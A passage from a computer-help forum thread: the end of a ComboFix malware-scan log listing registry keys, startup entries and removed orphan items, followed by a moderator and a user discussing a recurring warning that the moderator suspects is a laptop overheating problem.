@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]
2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon2]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]
2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon3]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]
2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon4]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay]
@="{904FB7E2-AD8B-45AF-B3A2-D309F7514790}"
[HKEY_CLASSES_ROOT\CLSID\{904FB7E2-AD8B-45AF-B3A2-D309F7514790}]
2012-04-09 14:27 190480 ----a-w- c:\windows\System32\CbFsMntNtf3.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay]
@="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}"
[HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}]
2012-04-09 14:27 190480 ----a-w- c:\windows\System32\CbFsMntNtf3.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2015-04-30 1337000]
"SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2010-03-23 487424]
.
------- Bijkomende Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: &Verzenden naar OneNote - c:\progra~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: Afbeelding verzenden naar &Bluetooth-apparaat... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: E&xporteren naar Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Pagina verzenden naar &Bluetooth-apparaat... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
TCP: DhcpNameServer = 192.168.178.1
TCP: Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: DhcpNameServer = 192.168.178.1
FF - ProfilePath - c:\users\Thomas\AppData\Roaming\Mozilla\Firefox\Profiles\wvk3h4r8.default\
FF - prefs.js: browser.startup.homepage - hxxps://alliances.commandandconquer.com/login/auth?utm_medium=referral&utm_source=www.google.nl&utm_campaign=cca_g-s-holland-cca
.
- - - - ORPHANS VERWIJDERD - - - -
.
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
AddRemove-SpyHunter - c:\users\Thomas\AppData\Roaming\Enigma Software Group\sh_installer.exe
AddRemove-{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{5e9aae86} - c:\windows\System32\config\systemprofile\AppData\Local\Clip Converter\\clipcnv.dll
AddRemove-UnityWebPlayer - c:\users\Thomas\AppData\Local\Unity\WebPlayer\Uninstall.exe
AddRemove-World in Conflict MW Mod 2.0 Open Beta - 0:\users\Public\Documents\World in Conflict\Mods\MW Mod 2.0 Open Beta Uninstall
.
.
.
--------------------- VERGRENDELDE REGISTER SLEUTELS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_11_7_700_224_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_11_7_700_224_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_7_700_224_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_7_700_224_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_7_700_224.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_7_700_224.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_7_700_224.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_7_700_224.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Voltooingstijd: 2016-01-31  23:27:49
ComboFix-quarantined-files.txt  2016-01-31 22:27
.
Pre-Run: 57.849.155.584 bytes beschikbaar
Post-Run: 57.438.732.288 bytes beschikbaar
.
- - End Of File - - 8FDAEE5668B7B6E00B01B26D30D7FAC0
190409C5DEB4517ACAEAFB97B36C57AB


#10
Essexboy


    GeekU Moderator

  • Retired Staff
  • 69,964 posts

Do you get the warning every time you boot or when you run a specific programme?




#11
Tommie


    Member

  • Topic Starter
  • 39 posts

The warning pops up regularly after 1 or 2 hours. Even if the laptop is idle and no programs are running.



#12
Essexboy


    GeekU Moderator

  • Retired Staff
  • 69,964 posts
As it is only after a few hours, we may have a temperature problem.

When the error appears, could you run this programme:

Download Speedfan and install it. Once it's installed, run the program and post here the information it shows. The information I want you to post is the stuff that is circled in the example picture I have attached.
If you are running on a Vista machine, please go to where you installed the program and run the program as administrator.

speedfan.png
(this is a screenshot from a Vista machine)

#13
Tommie


    Member

  • Topic Starter
  • 39 posts

It only shows the temperature info as below. I am not sure if it's a temperature thing. Even if the laptop is in standby and I unlock the laptop to start using it, the message pops up.

The results are in the attachment.

Attached Thumbnails

  • Temp.jpg

Edited by Tommie, 01 February 2016 - 11:07 AM.


#14
Essexboy


    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Does the laptop feel warm underneath? Are the vents clear, as temp 1 is increasing?

I believe you are now malware free.

#15
Tommie


    Member

  • Topic Starter
  • 39 posts

They seem clear. I always use the laptop on my table. It only gets quite warm if I play a game. Just now I get the error again after my laptop has been on standby for a few hours.


Edited by Tommie, 02 February 2016 - 11:18 AM.






